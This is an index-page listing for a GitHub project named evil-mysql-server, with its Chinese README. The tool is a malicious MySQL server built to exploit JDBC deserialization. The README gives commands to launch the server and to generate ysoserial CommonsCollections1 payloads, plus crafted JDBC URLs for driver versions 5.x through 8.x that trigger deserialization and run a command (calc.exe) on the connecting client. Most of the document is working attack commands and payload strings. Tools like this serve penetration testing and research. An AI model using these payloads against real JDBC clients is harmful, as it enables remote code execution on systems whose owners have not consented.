Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/dushixiang/evil-mysql-server
evil-mysql-server is a malicious database written to target jdbc deserialization vulnerabilities and requires ysoserial.
https://github.com/dushixiang/evil-mysql-server
Last synced: 3 days ago
JSON representation
evil-mysql-server is a malicious database written to target jdbc deserialization vulnerabilities and requires ysoserial.
- Host: GitHub
- URL: https://github.com/dushixiang/evil-mysql-server
- Owner: dushixiang
- Created: 2021-11-03T13:01:45.000Z (about 3 years ago)
- Default Branch: master
- Last Pushed: 2022-10-23T06:21:34.000Z (about 2 years ago)
- Last Synced: 2024-06-19T23:15:28.812Z (5 months ago)
- Language: Go
- Homepage:
- Size: 15.6 KB
- Stars: 70
- Watchers: 2
- Forks: 12
- Open Issues: 0
-
Metadata Files:
- Readme: README-zh_CN.md
Awesome Lists containing this project
README
# evil mysql server
[English](./README.MD) | 简体中文
## 简介
**evil-mysql-server** 是一个针对 jdbc 反序列化漏洞编写的恶意数据库,依赖 ysoserial 。
使用方式
[ysoserial](https://github.com/frohoff/ysoserial)
```shell
./evil-mysql-server -addr 3306 -java java -ysoserial ysoserial-0.0.6-SNAPSHOT-all.jar
```
启动成功后,使用 jdbc 进行连接,其中用户名称格式为 `yso_payload_command` , 连接成功后 `evil-mysql-server` 会解析用户名称,并使用如以下命令生成恶意数据返回到 jdbc 客户端。
```shell
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections1 calc.exe
```
[ysuserial](https://github.com/su18/ysoserial) 这是一个基于原始ysoserial的增强项目。
```shell
./evil-mysql-server -addr 3306 -java java -ysuserial ysuserial-0.9-su18-all.jar
```
启动成功后,使用 jdbc 进行连接,其中用户名称格式为 `yso_payload_command` , 连接成功后 `evil-mysql-server` 会解析用户名称,并使用如以下命令生成恶意数据返回到 jdbc 客户端。
```shell
java -jar ysuserial-0.9-su18-all.jar -g CommonsCollections1 -p calc.exe
```
## JDBC url 示例
> 使用 ysuserial 时请修改username的前三个字符为 **ysu**
**5.1.11-5.x**
```shell
jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_CommonsCollections1_calc.exe
```
**6.x**
```shell
jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_CommonsCollections1_calc.exe
```
**8.x**
```shell
jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_CommonsCollections1_calc.exe
```
## 致谢
感谢以下项目,带来的启发
- [MySQL_Fake_Server](https://github.com/fnmsd/MySQL_Fake_Server)